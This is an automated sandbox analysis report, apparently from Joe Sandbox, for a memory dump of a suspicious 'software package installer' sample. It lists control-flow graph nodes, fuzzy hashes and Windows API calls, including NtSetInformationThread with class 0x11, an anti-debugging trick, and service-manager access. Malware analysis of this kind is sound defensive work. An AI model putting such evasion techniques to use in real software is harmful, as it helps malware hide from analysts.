6c893b62-6c893b85 4951->4958 4953->4924 4961 6c893b56-6c893b5d 4953->4961 4954->4948 4969 6c893be0-6c893bfe 4955->4969 4957->4936 4958->4934 4962 6c893b8b 4958->4962 4961->4937 4962->4950 4972 6c893e7b 4969->4972 4973 6c893c04-6c893c11 4969->4973 4974 6c893e81-6c893ee0 call 6c893750 GetCurrentThread NtSetInformationThread 4972->4974 4975 6c893ce0-6c893cea 4973->4975 4976 6c893c17-6c893c20 4973->4976 4991 6c893eea-6c893f04 call 6c9e18a0 call 6c9e18b0 4974->4991 4977 6c893d3a-6c893d3c 4975->4977 4978 6c893cec-6c893d0c 4975->4978 4979 6c893dc5 4976->4979 4980 6c893c26-6c893c2d 4976->4980 4984 6c893d3e-6c893d45 4977->4984 4985 6c893d70-6c893d8d 4977->4985 4983 6c893d90-6c893d95 4978->4983 4986 6c893dc6 4979->4986 4987 6c893dc3 4980->4987 4988 6c893c33-6c893c3a 4980->4988 4993 6c893dba-6c893dc1 4983->4993 4994 6c893d97-6c893db8 4983->4994 4992 6c893d50-6c893d57 4984->4992 4985->4983 4995 6c893dc8-6c893dcc 4986->4995 4987->4979 4989 6c893c40-6c893c5b 4988->4989 4990 6c893e26-6c893e2b 4988->4990 4996 6c893e1b-6c893e24 4989->4996 4997 6c893c7b-6c893cd0 4990->4997 4998 6c893e31 4990->4998 5012 6c893f75-6c893fa1 4991->5012 4992->4986 4993->4987 5000 6c893dd7-6c893ddc 4993->5000 4994->4979 4995->4969 5001 6c893dd2 4995->5001 4996->4995 5005 6c893e76-6c893e79 4996->5005 4997->4992 4998->4955 5003 6c893dde-6c893e17 5000->5003 5004 6c893e36-6c893e3d 5000->5004 5001->5005 5003->4996 5006 6c893e5c-6c893e5f 5004->5006 5007 6c893e3f-6c893e5a 5004->5007 5005->4974 5006->4997 5010 6c893e65-6c893e69 5006->5010 5007->4996 5010->4995 5010->5005 5016 6c894020-6c894026 5012->5016 5017 6c893fa3-6c893fa8 5012->5017 5018 6c89402c-6c89403c 5016->5018 5019 6c893f06-6c893f35 5016->5019 5020 6c89407c-6c894081 5017->5020 5021 6c893fae-6c893fcf 5017->5021 5025 6c89403e-6c894058 5018->5025 5026 6c8940b3-6c8940b8 5018->5026 5024 6c893f38-6c893f61 5019->5024 5022 6c8940aa-6c8940ae 5020->5022 5023 6c894083-6c89408a 5020->5023 5021->5022 5031 6c893f6b-6c893f6f 5022->5031 5023->5024 5027 6c894090 5023->5027 5029 6c893f64-6c893f67 5024->5029 5030 6c89405a-6c894063 5025->5030 5026->5021 5028 6c8940be-6c8940c9 5026->5028 5027->4991 5032 6c8940a7 5027->5032 5028->5022 5033 6c8940cb-6c8940d4 5028->5033 5034 6c893f69 5029->5034 5035 6c894069-6c89406c 5030->5035 5036 6c8940f5-6c89413f 5030->5036 5031->5012 5032->5022 5033->5032 5037 6c8940d6-6c8940f0 5033->5037 5034->5031 5039 6c894072-6c894077 5035->5039 5040 6c894144-6c89414b 5035->5040 5036->5034 5037->5030 5039->5029 5040->5031
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e0f50237311ab6e08ce9e8096c77f57436e2e95b829a8bc245d7c45df008c8d0
                          • Instruction ID: b97e9f9f9a79084127cc0db0cd03dac7e38648d72002c970f0ae93bcb037fb36
                          • Opcode Fuzzy Hash: e0f50237311ab6e08ce9e8096c77f57436e2e95b829a8bc245d7c45df008c8d0
                          • Instruction Fuzzy Hash: 8932C132245B018FC334CF2CC9D0695B7E3EFD53147698E6CC0AA5BA55D775B84A8B50
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: e9e5d317233e69ea14b37a82395766f9227272527ec25739b5e2cd15dc0d2ff5
                          • Instruction ID: f4bf3b18db00deb2e5df67f04de761ffc0c4e9df4c7e54f16617b8301bbd4299
                          • Opcode Fuzzy Hash: e9e5d317233e69ea14b37a82395766f9227272527ec25739b5e2cd15dc0d2ff5
                          • Instruction Fuzzy Hash: 2D51CF31544B018FC3308F28C990785B7E3BFE6314F698E5DC0AA5BA95DB74B94A8B41
                          APIs
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: CurrentThread
                          • String ID:
                          • API String ID: 2882836952-0
                          • Opcode ID: ee163927ca17778f4c6db58f85af789f42985c59086641f9e05af506b5860873
                          • Instruction ID: 62079b394e844b99edfe34681a54e6a771f9acf06b0e0edf3831e4febe4f0fcd
                          • Opcode Fuzzy Hash: ee163927ca17778f4c6db58f85af789f42985c59086641f9e05af506b5860873
                          • Instruction Fuzzy Hash: 4A51BD31504B018FC3308F2CC990799B7E3BFD6314F698E5DC0AA5BA95DB70B94A8B91
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 6C893E9D
                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C893EAA
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: Thread$CurrentInformation
                          • String ID:
                          • API String ID: 1650627709-0
                          • Opcode ID: 575a2fd9e11937e64b90a62ef8748b877a6495034004fbcf2928ead369814d9b
                          • Instruction ID: 45d4a5f2c09683d5c124bb27b30213024bc22ca1594ed1987e9bb1e52df2b970
                          • Opcode Fuzzy Hash: 575a2fd9e11937e64b90a62ef8748b877a6495034004fbcf2928ead369814d9b
                          • Instruction Fuzzy Hash: 7031E131545B058FC330CF28C9947C6B7B3AFE6314F698E1DC0AA5BA91DB7478099B51
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 6C893E9D
                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C893EAA
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: Thread$CurrentInformation
                          • String ID:
                          • API String ID: 1650627709-0
                          • Opcode ID: 76c6aecf6bf4e28f7ac591108543c2ef2fadd3a509ac6b436696c77da6b9633c
                          • Instruction ID: 03641d45a07ba9acd8e9e6f2faaccf57322eeeb9cfde8bb65c22b9eafbbff6b1
                          • Opcode Fuzzy Hash: 76c6aecf6bf4e28f7ac591108543c2ef2fadd3a509ac6b436696c77da6b9633c
                          • Instruction Fuzzy Hash: AC31EF31104B058FC734CF2CC994796B7B2AF96308F694E5DC0AA5BA91DB71B8458B92
                          APIs
                          • GetCurrentThread.KERNEL32 ref: 6C893E9D
                          • NtSetInformationThread.NTDLL(00000000,00000011,00000000,00000000), ref: 6C893EAA
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: Thread$CurrentInformation
                          • String ID:
                          • API String ID: 1650627709-0
                          • Opcode ID: ad19e763d4760e3a7a4fea5623e53f4aca2cbab9628b19c245911588d533cf5e
                          • Instruction ID: 8f4268ad3b4928bce07b797426db966bcb338bbf0f322179d39d4c98d9495bb7
                          • Opcode Fuzzy Hash: ad19e763d4760e3a7a4fea5623e53f4aca2cbab9628b19c245911588d533cf5e
                          • Instruction Fuzzy Hash: 8A21F430118B058FD334CF2CC9A479A77B2AF97305F644E1DD0BB8BA91DB74A8048B52
                          APIs
                          • OpenSCManagerA.SECHOST(00000000,00000000,00000001), ref: 6CA13F40
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ManagerOpen
                          • String ID:
                          • API String ID: 1889721586-0
                          • Opcode ID: 496b4fc909bdb71d91684e9e9ad4fb702edcb51fee0c32b68175994ec35a76f5
                          • Instruction ID: 5afed924c15b04b4292a4ce4d43adeb6b0dc806a36707f226094365384e3540a
                          • Opcode Fuzzy Hash: 496b4fc909bdb71d91684e9e9ad4fb702edcb51fee0c32b68175994ec35a76f5
                          • Instruction Fuzzy Hash: 4831077460D341AFC700CF29C889A1ABBF1AB85754F148859F4D9CB691C335D884CB63
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: "OP$#OP$#OP$+duH$+duH$/+p8$/+p8$H$J\$J\$P$Rr!A$Sr!A$Sr!A$p
                          • API String ID: 0-2001680094
                          • Opcode ID: ddf6dbc470f38d07c173e240405f53269d3693000f64b830fac9edabb46f345f
                          • Instruction ID: 07d923f2b5eddb13aff10c13ce18bbdf7662af8144720f9b40f9c63a5bd562a4
                          • Opcode Fuzzy Hash: ddf6dbc470f38d07c173e240405f53269d3693000f64b830fac9edabb46f345f
                          • Instruction Fuzzy Hash: 72A29CB450D3858FC725CF18C49066ABBF2AFEA318F148D5EE494C7762EA34D44A8B53

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 3914 6ca2b8f3-6ca2b903 3915 6ca2b905-6ca2b918 call 6ca1e7ff call 6ca1e7ec 3914->3915 3916 6ca2b91d-6ca2b91f 3914->3916 3932 6ca2bc9c 3915->3932 3918 6ca2bc84-6ca2bc91 call 6ca1e7ff call 6ca1e7ec 3916->3918 3919 6ca2b925-6ca2b92b 3916->3919 3937 6ca2bc97 call 6ca1ef40 3918->3937 3919->3918 3922 6ca2b931-6ca2b957 3919->3922 3922->3918 3925 6ca2b95d-6ca2b966 3922->3925 3928 6ca2b980-6ca2b982 3925->3928 3929 6ca2b968-6ca2b97b call 6ca1e7ff call 6ca1e7ec 3925->3929 3930 6ca2bc80-6ca2bc82 3928->3930 3931 6ca2b988-6ca2b98b 3928->3931 3929->3937 3936 6ca2bc9f-6ca2bca2 3930->3936 3931->3930 3935 6ca2b991-6ca2b995 3931->3935 3932->3936 3935->3929 3939 6ca2b997-6ca2b9ae 3935->3939 3937->3932 3942 6ca2b9b0-6ca2b9b3 3939->3942 3943 6ca2b9ff-6ca2ba05 3939->3943 3945 6ca2b9c3-6ca2b9c9 3942->3945 3946 6ca2b9b5-6ca2b9be 3942->3946 3947 6ca2ba07-6ca2ba11 3943->3947 3948 6ca2b9cb-6ca2b9e2 call 6ca1e7ff call 6ca1e7ec call 6ca1ef40 3943->3948 3945->3948 3952 6ca2b9e7-6ca2b9fa 3945->3952 3951 6ca2ba83-6ca2ba93 3946->3951 3949 6ca2ba13-6ca2ba15 3947->3949 3950 6ca2ba18-6ca2ba36 call 6ca23615 call 6ca235db * 2 3947->3950 3980 6ca2bbb7 3948->3980 3949->3950 3985 6ca2ba53-6ca2ba7c call 6ca29a89 3950->3985 3986 6ca2ba38-6ca2ba4e call 6ca1e7ec call 6ca1e7ff 3950->3986 3954 6ca2bb58-6ca2bb61 call 6ca30805 3951->3954 3955 6ca2ba99-6ca2baa5 3951->3955 3952->3951 3969 6ca2bb63-6ca2bb75 3954->3969 3970 6ca2bbd4 3954->3970 3955->3954 3958 6ca2baab-6ca2baad 3955->3958 3958->3954 3962 6ca2bab3-6ca2bad7 3958->3962 3962->3954 3966 6ca2bad9-6ca2baef 3962->3966 3966->3954 3971 6ca2baf1-6ca2baf3 3966->3971 3969->3970 3975 6ca2bb77-6ca2bb86 GetConsoleMode 3969->3975 3973 6ca2bbd8-6ca2bbf0 ReadFile 3970->3973 3971->3954 3976 6ca2baf5-6ca2bb1b 3971->3976 3978 6ca2bbf2-6ca2bbf8 3973->3978 3979 6ca2bc4c-6ca2bc57 GetLastError 3973->3979 3975->3970 3981 6ca2bb88-6ca2bb8c 3975->3981 3976->3954 3984 6ca2bb1d-6ca2bb33 3976->3984 3978->3979 3989 6ca2bbfa 3978->3989 3987 6ca2bc70-6ca2bc73 3979->3987 3988 6ca2bc59-6ca2bc6b call 6ca1e7ec call 6ca1e7ff 3979->3988 3983 6ca2bbba-6ca2bbc4 call 6ca235db 3980->3983 3981->3973 3982 6ca2bb8e-6ca2bba8 ReadConsoleW 3981->3982 3990 6ca2bbaa GetLastError 3982->3990 3991 6ca2bbc9-6ca2bbd2 3982->3991 3983->3936 3984->3954 3995 6ca2bb35-6ca2bb37 3984->3995 3985->3951 3986->3980 3992 6ca2bbb0-6ca2bbb6 call 6ca1e812 3987->3992 3993 6ca2bc79-6ca2bc7b 3987->3993 3988->3980 3999 6ca2bbfd-6ca2bc0f 3989->3999 3990->3992 3991->3999 3992->3980 3993->3983 3995->3954 4002 6ca2bb39-6ca2bb53 3995->4002 3999->3983 4006 6ca2bc11-6ca2bc15 3999->4006 4002->3954 4007 6ca2bc17-6ca2bc27 call 6ca2bd1e 4006->4007 4008 6ca2bc2e-6ca2bc39 4006->4008 4020 6ca2bc2a-6ca2bc2c 4007->4020 4014 6ca2bc45-6ca2bc4a call 6ca2bfd6 4008->4014 4015 6ca2bc3b call 6ca2bca3 4008->4015 4021 6ca2bc40-6ca2bc43 4014->4021 4015->4021 4020->3983 4021->4020
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8Q
                          • API String ID: 0-4022487301
                          • Opcode ID: 9dfd7a58ac9b85604f6bbacf4fb35119d7c397b10a952e36dcb675224ffb490f
                          • Instruction ID: a4ba0acd7b6fa323b589a045dba08b2104a0a0472526fb4d1d8ab420a84fc9a3
                          • Opcode Fuzzy Hash: 9dfd7a58ac9b85604f6bbacf4fb35119d7c397b10a952e36dcb675224ffb490f
                          • Instruction Fuzzy Hash: 83C12970E042599FDF05CF99D880BADBBB1BF4A318F1C4259E511ABF41CB389985CBA1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4023 6ca32e8c-6ca32ebc call 6ca3330c 4026 6ca32ed7-6ca32ee3 call 6ca3042c 4023->4026 4027 6ca32ebe-6ca32ec9 call 6ca1e7ff 4023->4027 4033 6ca32ee5-6ca32efa call 6ca1e7ff call 6ca1e7ec 4026->4033 4034 6ca32efc-6ca32f45 call 6ca33277 4026->4034 4032 6ca32ecb-6ca32ed2 call 6ca1e7ec 4027->4032 4043 6ca331b1-6ca331b5 4032->4043 4033->4032 4041 6ca32fb2-6ca32fbb GetFileType 4034->4041 4042 6ca32f47-6ca32f50 4034->4042 4047 6ca33004-6ca33007 4041->4047 4048 6ca32fbd-6ca32fee GetLastError call 6ca1e812 CloseHandle 4041->4048 4045 6ca32f52-6ca32f56 4042->4045 4046 6ca32f87-6ca32fad GetLastError call 6ca1e812 4042->4046 4045->4046 4052 6ca32f58-6ca32f85 call 6ca33277 4045->4052 4046->4032 4050 6ca33010-6ca33016 4047->4050 4051 6ca33009-6ca3300e 4047->4051 4048->4032 4062 6ca32ff4-6ca32fff call 6ca1e7ec 4048->4062 4055 6ca3301a-6ca33068 call 6ca305d0 4050->4055 4056 6ca33018 4050->4056 4051->4055 4052->4041 4052->4046 4066 6ca33087-6ca330af call 6ca33530 4055->4066 4067 6ca3306a-6ca33076 call 6ca33486 4055->4067 4056->4055 4062->4032 4072 6ca330b1-6ca330b2 4066->4072 4073 6ca330b4-6ca330f5 4066->4073 4067->4066 4074 6ca33078 4067->4074 4075 6ca3307a-6ca33082 call 6ca2a745 4072->4075 4076 6ca330f7-6ca330fb 4073->4076 4077 6ca33116-6ca33124 4073->4077 4074->4075 4075->4043 4076->4077 4078 6ca330fd-6ca33111 4076->4078 4079 6ca3312a-6ca3312e 4077->4079 4080 6ca331af 4077->4080 4078->4077 4079->4080 4082 6ca33130-6ca33163 CloseHandle call 6ca33277 4079->4082 4080->4043 4086 6ca33197-6ca331ab 4082->4086 4087 6ca33165-6ca33191 GetLastError call 6ca1e812 call 6ca3053f 4082->4087 4086->4080 4087->4086
                          APIs
                            • Part of subcall function 6CA33277: CreateFileW.KERNEL32(00000000,00000000,?,6CA32F35,?,?,00000000,?,6CA32F35,00000000,0000000C), ref: 6CA33294
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA32FA0
                          • __dosmaperr.LIBCMT ref: 6CA32FA7
                          • GetFileType.KERNEL32(00000000), ref: 6CA32FB3
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA32FBD
                          • __dosmaperr.LIBCMT ref: 6CA32FC6
                          • CloseHandle.KERNEL32(00000000), ref: 6CA32FE6
                          • CloseHandle.KERNEL32(6CA29EF0), ref: 6CA33133
                          • GetLastError.KERNEL32 ref: 6CA33165
                          • __dosmaperr.LIBCMT ref: 6CA3316C
                          Strings
                          Memory Dump Source
                          • Source File: 00000006.00000002.2040338619.000000006C891000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C890000, based on PE: true
                          • Associated: 00000006.00000002.2040310415.000000006C890000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041690153.000000006CA36000.00000002.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2041765466.000000006CA46000.00000008.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042402374.000000006CB11000.00000004.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2042435429.000000006CB17000.00000020.00000001.01000000.00000009.sdmpDownload File
                          • Associated: 00000006.00000002.2043157037.000000006CBFD000.00000002.00000001.01000000.00000009.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_6_2_6c890000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                          Similarity
                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                          • String ID: 8Q
                          • API String ID: 4237864984-4022487301
                          • Opcode ID: 4366e1400cb0c2062caccabca549657410929fa4f84154c071408bc4512a35cc
                          • Instruction ID: e80a8efc0a64646f5d5db8cd454d4e4495e508bf10fb4fe69c23245a672ce5d7
                          • Opcode Fuzzy Hash: 4366e1400cb0c2062caccabca549657410929fa4f84154c071408bc4512a35cc
                          • Instruction Fuzzy Hash: 15A17C32A081648FCF098F68C8657AD7BB1AB07328F18524DE855EF7C1DB35888BC791

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4092 6c9eb750-6c9eb7c0 call 6ca15990 call 6ca1a740 4097 6c9eb7e6-6c9eb7ef 4092->4097 4098 6c9eb850-6c9eb855 4097->4098 4099 6c9eb7f1-6c9eb7f6 4097->4099 4102 6c9eb85b-6c9eb860 4098->4102 4103 6c9eb950-6c9eb955 4098->4103 4100 6c9eb7fc-6c9eb801 4099->4100 4101 6c9eb8b0-6c9eb8b5 4099->4101 4104 6c9eb9ac-6c9eb9b1 4100->4104 4105 6c9eb807-6c9eb80c 4100->4105 4110 6c9eba0e-6c9eba13 4101->4110 4111 6c9eb8bb-6c9eb8c0 4101->4111 4108 6c9eb9dd-6c9eb9e2 4102->4108 4109 6c9eb866-6c9eb86b 4102->4109 4106 6c9eb95b-6c9eb960 4103->4106 4107 6c9eba75-6c9eba7a 4103->4107 4124 6c9eb9b7-6c9eb9bc 4104->4124 4125 6c9ebbf1-6c9ebbf6 4104->4125 4114 6c9ebab6-6c9ebabb 4105->4114 4115 6c9eb812-6c9eb817 4105->4115 4118 6c9ebb9a-6c9ebb9f 4106->4118 4119 6c9eb966-6c9eb96b 4106->4119 4122 6c9ebcdb-6c9ebce0 4107->4122 4123 6c9eba80-6c9eba85 4107->4123 4112 6c9ebc2c-6c9ebc31 4108->4112 4113 6c9eb9e8-6c9eb9ed 4108->4113 4120 6c9ebafa-6c9ebaff 4109->4120 4121 6c9eb871-6c9eb876 4109->4121 4116 6c9ebc79-6c9ebc7e 4110->4116 4117 6c9eba19-6c9eba1e 4110->4117 4126 6c9ebb48-6c9ebb4d 4111->4126 4127 6c9eb8c6-6c9eb8cb 4111->4127 4152 6c9ebc37-6c9ebc3c 4112->4152 4153 6c9ec162-6c9ec193 4112->4153 4144 6c9ebf46-6c9ebf81 call 6ca1a740 call 6c9ea500 4113->4144 4145 6c9eb9f3-6c9eb9f8 4113->4145 4128 6c9ec026-6c9ec04e 4114->4128 4129 6c9ebac1-6c9ebac6 4114->4129 4146 6c9eb81d-6c9eb822 4115->4146 4147 6c9ebd16-6c9ebd1b 4115->4147 4158 6c9ec1c7-6c9ec1f6 4116->4158 4159 6c9ebc84-6c9ebc89 4116->4159 4150 6c9ebfab-6c9ebfcb 4117->4150 4151 6c9eba24-6c9eba29 4117->4151 4140 6c9ebba5-6c9ebbaa 4118->4140 4141 6c9ec0e0-6c9ec10c 4118->4141 4136 6c9ebe2a-6c9ebe2f 4119->4136 4137 6c9eb971-6c9eb976 4119->4137 4134 6c9ebb05-6c9ebb0a 4120->4134 4135 6c9ec082-6c9ec099 4120->4135 4154 6c9eb87c-6c9eb881 4121->4154 4155 6c9ebd43-6c9ebd48 4121->4155 4132 6c9ec22e-6c9ec23e 4122->4132 4133 6c9ebce6-6c9ebceb 4122->4133 4156 6c9eba8b-6c9eba90 4123->4156 4157 6c9ebff5-6c9ec005 4123->4157 4142 6c9ebebc-6c9ebf24 4124->4142 4143 6c9eb9c2-6c9eb9c7 4124->4143 4148 6c9ebbfc-6c9ebc01 4125->4148 4149 6c9ec13d-6c9ec15d 4125->4149 4138 6c9ebc9a-6c9ebcd6 4126->4138 4139 6c9ebb53-6c9ebb58 4126->4139 4130 6c9ebda6-6c9ebdab 4127->4130 4131 6c9eb8d1-6c9eb8d6 4127->4131 4162 6c9ec054-6c9ec05c 4128->4162 4160 6c9ebacc-6c9ebad1 4129->4160 4161 6c9ec061-6c9ec07a 4129->4161 4170 6c9ebdd0-6c9ebdf8 4130->4170 4188 6c9ebdad-6c9ebdb2 4130->4188 4178 6c9eb8dc-6c9eb8e1 4131->4178 4179 6c9ebe83-6c9ebe93 4131->4179 